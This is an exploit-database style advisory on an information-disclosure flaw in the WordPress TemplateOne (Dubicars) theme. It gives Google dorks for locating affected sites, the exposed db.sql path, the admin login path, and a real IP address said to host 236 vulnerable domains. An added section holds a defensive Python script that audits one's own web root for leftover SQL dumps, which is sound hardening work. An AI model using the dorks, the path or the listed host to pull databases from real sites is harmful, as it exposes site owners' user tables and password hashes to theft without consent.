#################################################################################################
# Exploit Title : WordPress TemplateOne Themes Dubicars Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : All Current Versions
# Google Dorks :
inurl:"/wp-content/themes/templateone/"
intext:"© Copyright 2015 | Powered by Dubicars"
intext:"© Copyright 2017 | Powered by Dubicars"
intext:"© Copyright 2018 | Powered by Dubicars"
intext:"Powered by Dubicars"
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/themes/templateone/db.sql
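A local audit a site owner can run against their own document root to find database dumps left where the web server will serve them, such as the db.sql file above. This is an added example, not part of the original advisory; it generalizes from the theme directory to the whole document root, and the extra file suffixes and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# db.sql is the name from the advisory; the other suffixes are assumed common variants.
DUMP_NAME = re.compile(r"\.sql(\.(gz|bz2|zip|bak|old))?$", re.IGNORECASE)
SQL_MARKERS = (b"CREATE TABLE", b"INSERT INTO")
# WordPress keeps password hashes in <prefix>users (wp_users by default).
USER_TABLE = re.compile(
    rb"(CREATE TABLE(\s+IF NOT EXISTS)?|INSERT INTO)\s+`?\w*users\b", re.IGNORECASE)

def inspect_file(path, limit=8 * 1024 * 1024):
    """Read up to `limit` bytes; return (looks like SQL dump, mentions a users table)."""
    with open(path, "rb") as fh:
        data = fh.read(limit)
    return any(m in data for m in SQL_MARKERS), bool(USER_TABLE.search(data))

def audit_webroot(docroot):
    """Return one finding per dump-like file stored under the document root."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not DUMP_NAME.search(name):
                continue
            full = os.path.join(dirpath, name)
            is_dump, has_users = inspect_file(full)
            findings.append({
                "url_path": "/" + os.path.relpath(full, docroot).replace(os.sep, "/"),
                "world_readable": bool(os.stat(full).st_mode & stat.S_IROTH),
                "sql_dump": is_dump,      # False for compressed files: flagged by name only
                "user_table": has_users,
            })
    return sorted(findings, key=lambda f: f["url_path"])

def build_sample_tree(root):
    """Constructed sample data: a theme directory holding a leftover dump."""
    theme = os.path.join(root, "wp-content", "themes", "templateone")
    os.makedirs(theme)
    with open(os.path.join(theme, "db.sql"), "wb") as fh:
        fh.write(b"CREATE TABLE `wp_users` (ID bigint, user_pass varchar(255));\n")
    with open(os.path.join(theme, "style.css"), "wb") as fh:
        fh.write(b"/* Theme Name: sample */\n")
    os.chmod(os.path.join(theme, "db.sql"), 0o644)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in audit_webroot(tmp):
            print(finding)
```

Any finding with "user_table" set means account data has been sitting in a web-reachable path: delete the file, keep backups outside the document root, and rotate the passwords and keys it contained.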
#################################################################################################
# Example Vulnerable Sites =>
Vulnerable IP Address => (108.179.230.34)
There are 236 domains hosted on this server.
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################